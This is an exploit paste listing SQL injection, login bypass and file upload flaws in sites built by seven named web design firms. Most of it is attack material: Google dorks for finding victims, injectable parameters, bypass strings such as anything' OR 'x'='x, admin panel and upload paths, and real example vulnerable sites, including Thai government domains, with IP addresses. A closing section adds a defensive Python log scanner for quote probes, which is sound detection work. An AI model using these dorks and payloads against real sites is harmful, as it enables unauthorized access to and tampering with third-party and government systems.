KingSkrupellos

7 Different Vendors Web Designs SQL Injection 25/01/2019

Jan 25th, 2019
####################################################################

# Exploit Title : Vinayak * Royalways * Apurva Infosystems AxisCompuTech
* Hands in Technology * Computerization Cell * TimesMedia Hosting * VivaDizayn *
SQL Injection / Authentication Bypass / Remote File Upload
------------------------------------------------------------------------------------------------
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 26/01/2019
# Vendor Homepages of Vulnerable Products :
1) vinayak.com
2) royalways.com
3) apurvainfosystems.com - axiscomputech.in
4) handsintechnology.com
5) wbprd.nic.in
6) timesmedia.co.th
7) vivadizayn.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
CWE-264 [ Permissions, Privileges, and Access Controls ]
CWE-592 [ Authentication Bypass Issues ]

####################################################################

# Products from 6 vendors suffer from remote SQL Injection vulnerabilities.
***************************************************************************

1) Designed by Vinayak SQL Injection Vulnerability

2) Website Design By Royalways SQL Injection and Authentication Bypass Vulnerability

3) Designed by Apurva Infosystems SQL Injection Vulnerability

4) Powered By Hands in Technology India SQL Injection Vulnerability

5) Designed & Developed By Computerization Cell
National Informatics Centre India SQL Injection Vulnerability

6) TimesMedia.Co.Th ThailandGov SQL Injection and Multiple Vulnerabilities

7) Design - Technology VivaDizayn SQL Injection Vulnerability

####################################################################

# Google Dorks for Vulnerable Different Products :
********************************************
1) intext:designed by Vinayak site:in

2) intext:Website Design By Royalways

3) intext:designed by : Apurva Infosystems
intext:by Axis Computech & Peripherals Pvt. Ltd.

4) intext:Powered By : Hands in Technology site:in

5) intext:Designed & Developed By Computerization Cell
intext:Designed and Developed by : National Informatics Centre

6) inurl:''/select_news.php?news_id='' site:go.th

7) intext:Design - Technology VivaDizayn

####################################################################

1) Designed by Vinayak SQL Injection Vulnerability
********************************************
# Google Dork:
**************
intext:designed by Vinayak site:in

# SQL Injection Exploit :
***********************
/campusupdate.php?id=[SQL Injection]

# Example Vulnerable Site :
*************************
[+] gnct.co.in/campusupdate.php?id=78%27

Note => (50.28.79.232) => There are 369 domains hosted on this server.

Note => (173.236.156.143) => There are 46 domains hosted on this server.

# SQL Database Error :
**********************
Warning: mysql_connect(): Access denied for user 'gniot_cognew
'@'localhost' (using password: YES) in /home/gnctgro7916
/gnct.co.in/campusupdate.php on line 42

####################################################################

2) Website Design By Royalways SQL Injection and Authentication Bypass Vulnerability
**************************************************************************
# Google Dork:
**************
intext:Website Design By Royalways

# SQL Injection Exploit :
***********************
/new_arrival.php?count=[SQL Injection]

# Admin Login Path :
*******************
/admin/

# Authentication Bypass Exploit :
*****************************
Admin username => '=''or'
Admin password => '=''or'

/admin/home.php
/admin/add_cat.php
/admin/view_cat.php
/admin/add_product.php
/admin/view_products.php
/admin/add_coupon.php
/admin/manage_coupons.php
/admin/orders_status.php?sort=New
/admin/orders_status.php?sort=Pending
/admin/orders_status.php?sort=Delivered
/admin/manage_shipping.php
/admin/manage_currency.php
/admin/view_all_users.php
/admin/chg_pwd.php

# Example Vulnerable Site :
*************************
[+] hnh.in/new_arrival.php?count=1%27

Note : (198.49.66.2) => There are 81 domains hosted on this server.

Note : (198.49.66.5) => 1 Domain.

# SQL Database Error :
**********************
Warning: mysql_num_rows() expects parameter 1 to be
resource, boolean given in /home/hnhin/public_html
/products_new_arrival.php on line 159

####################################################################

3) Designed by Apurva Infosystems SQL Injection Vulnerability
******************************************************
# Google Dork :
**************
intext:designed by : Apurva Infosystems
intext:by Axis Computech & Peripherals Pvt. Ltd.

# SQL Injection Exploit :
***********************
/index.php?id=[SQL Injection]

/laptops.php?id=[SQL Injection]

# Example Vulnerable Site :
*************************
[+] lenovoretail.in/index.php?id=1%27

Note : (173.254.75.123) => There are 109 domains hosted on this server.

Note : (208.79.234.118) => There are 90 domains hosted on this server.

# SQL Database Error :
**********************
Warning: mysql_query(): Access denied for user
''@'localhost' (using password: NO) in /home
/lenovoretail/public_html/index.php on line 59

####################################################################

4) Powered By Hands in Technology SQL Injection Vulnerability
*******************************************************
# Google Dork:
**************
intext:Powered By : Hands in Technology site:in

# SQL Injection Exploit :
***********************
/our-campaigns.php?id=[SQL Injection]

# Example Vulnerable Site :
*************************
[+] struggleforjustice.in/our-campaigns.php?id=93%27

Note : (108.167.158.159) => There are 58 domains hosted on this server.

Note : (166.62.27.182) => There are 1,024 domains hosted on this server.

# SQL Database Error :
**********************
Deprecated: mysql_query(): The mysql extension is deprecated
and will be removed in the future: use mysqli or PDO instead in /home4/x0v7q0n7
/public_html/struggleforjustice.in/our-campaigns.php on line 74

####################################################################

5) Designed & Developed By Computerization Cell
National Informatics Centre India SQL Injection Vulnerability
******************************************************
# Google Dork:
**************
intext:Designed & Developed By Computerization Cell
intext:Designed and Developed by : National Informatics Centre

# SQL Injection Exploit :
***********************
/monthlyreport/cfcpgmonthlyreport.php?district=[SQL Injection]

# Example Vulnerable Site :
*************************
[+] wbprdgpms.in/monthlyreport/cfcpgmonthlyreport.php?district=15%27

Note : (164.100.178.145) => 2 Domains.

Note : (202.61.117.157) => 1 Domain.

# SQL Database Error :
**********************
Warning: mysql_fetch_array(): supplied argument is not a valid
MySQL result resource in D:\xampp\htdocs\gpmsstatus
\monthlyReport\cfcpgmonthlyreport.php on line 287

####################################################################

6) TimesMedia.Co.Th ThailandGov SQL Injection and Multiple Vulnerabilities
****************************************************************
# Google Dork :
*****************
inurl:''/select_news.php?news_id='' site:go.th

# CopyRight © 2015 www.timesmedia.co.th All Rights Reserved

# Note : Thailand Government WebSites are vulnerable.

# Admin Control Panel Login Path :
*******************************

/login_form.php
/admin.php

# SQL Injection Exploits :
***********************

/contact.php?content_id=[SQL Injection]

/base.php?content_id=[SQL Injection]

/council.php?content_id=[SQL Injection]

/history.php?content_id=[SQL Injection]

/person.php?content_id=[SQL Injection]

/vision.php?content_id=[SQL Injection]

/memorable.php?content_id=[SQL Injection]

/travel.php?content_id=[SQL Injection]

/stucture.php?content_id=[SQL Injection]

/admin1.php?content_id=[SQL Injection]

/otop.php?content_id=[SQL Injection]

/news.php?id_type=[SQL Injection]

/select_news.php?news_id=[SQL Injection]

/policy.php?content_id=[SQL Injection]

/office.php?content_id=[SQL Injection]

/data.php?content_id=[SQL Injection]

/strategy_plan.php?content_id=[SQL Injection]

/activity/user_select_photo.php?news_id=[SQL Injection]

/vdo/user_select_youtube.php?yt_id=[SQL Injection]

Unauthorized Topic Add without Administrator Permission Exploit =>
***********************************************************

TARGET/webboard/new.php?category=webboard

TARGET/webboard/index.php?category=webboard

Note : Use Mozilla Firefox Open Link No Redirect
Extension to Bypass Admin Control Panel

Download and Install on your Browser =>

addons.mozilla.org/en-US/firefox/addon/noredirect/

addons.mozilla.org/en-US/firefox/addon/open-link-directly-no-redirect/

If that does not work, try one of the SQL Authentication Exploit Payloads below =>
*******************************************************************

Admin Username : anything' OR 'x'='x

Admin Password : anything' OR 'x'='x

Directory File Path : /fileupload/....

Directory File Path : /activity/images/....

Remote File Upload Exploit =>
****************************

TARGET/admin/FCKeditor/editor/filemanager/upload/test.html

/UserFiles/....

Note : Only Thailand Government WebSites [ go.th ] are vulnerable to this issue.

# Example Vulnerable Sites :
**************************

=> Vulnerable IP Address => 61.19.250.25 =>

There are 52 domains hosted on this server.

Vendor Homepage Admin Panel => timesmedia.co.th/web58/admin/admin.php

[+] banthan.go.th/policy.php?content_id=1%27 =>

[ Proof of Concept for SQL Inj ] => archive.is/lkrrB

[+] makluakao.go.th/webboard/index.php?category=webboard =>

[ Proof of Concept ] => archive.is/azGk4

[+] phoklang.go.th/news.php?id_type=4%27 =>

[ Proof of Concept for RFU Vuln ] => archive.is/8wk57

# SQL Database Error :
*********************

Warning: mysql_fetch_array() expects parameter 1 to be
resource, boolean given in /home/phoklang/
domains/phoklang.go.th/public_html/news.php on line 129

####################################################################

7) Design - Technology VivaDizayn SQL Injection Vulnerability
*****************************************************
# Google Dork:
**************
intext:Design - Technology VivaDizayn

# SQL Injection Exploit :
**********************
/en/detay.php?id=[SQL Injection]

# Example Vulnerable Site :
************************
[+] rovelsan.com.tr/en/detay.php?id=696%27

Note : (185.67.122.66) => There are 210 domains hosted on this server.

# SQL Database Error :
*********************
Warning: mysql_fetch_array(): supplied argument is not a valid
MySQL result resource in /home/rovelsant/domains
/rovelsan.com.tr/public_html/en/detay.php on line 20

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################
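
For site operators: every example request in the paste appends an encoded single quote (`%27`) to a parameter that normally carries a number, and that pattern can be found in web-server access logs. The following is an added example, not part of the original paste; the log lines and client addresses are constructed, and `NUMERIC_PARAMS` is an assumed allow-list built from the parameter names listed above.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Parameter names taken from the endpoints listed in the paste; each is used
# there as a numeric record selector (assumption of this example).
NUMERIC_PARAMS = {"id", "count", "district", "content_id",
                  "id_type", "news_id", "yt_id"}

# Common/combined log format: client, identity, user, [time], "request", status
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) ')

# Constructed sample lines; addresses come from the RFC 5737 documentation ranges.
SAMPLE_LOG = """\
192.0.2.10 - - [26/Jan/2019:10:00:01 +0000] "GET /campusupdate.php?id=78 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [26/Jan/2019:10:00:05 +0000] "GET /campusupdate.php?id=78%27 HTTP/1.1" 200 312 "-" "Mozilla/5.0"
198.51.100.7 - - [26/Jan/2019:10:00:09 +0000] "GET /news.php?id_type=4%27 HTTP/1.1" 200 298 "-" "Mozilla/5.0"
203.0.113.5 - - [26/Jan/2019:10:01:00 +0000] "GET /search.php?q=o%27brien HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.9 - - [26/Jan/2019:10:02:00 +0000] "GET /select_news.php?news_id=410&page=2 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

def find_probes(log_text):
    """Return (client, path, param, decoded_value) for every request that puts
    a non-numeric value into a parameter the application treats as a number."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line; skip rather than guess
        url = urlsplit(m["target"])
        # parse_qsl percent-decodes, so %27 is compared as a literal quote
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name.lower() in NUMERIC_PARAMS and not re.fullmatch(r"[0-9]+", value):
                findings.append((m["client"], url.path, name, value))
    return findings

def probes_by_client(findings):
    """Count findings per client so repeated probing stands out."""
    return Counter(client for client, _, _, _ in findings)

if __name__ == "__main__":
    hits = find_probes(SAMPLE_LOG)
    for hit in hits:
        print(hit)
    print(probes_by_client(hits).most_common())
```

The free-text `q=o%27brien` request is not reported because `q` is not in the numeric allow-list, which keeps legitimate apostrophes from raising alerts.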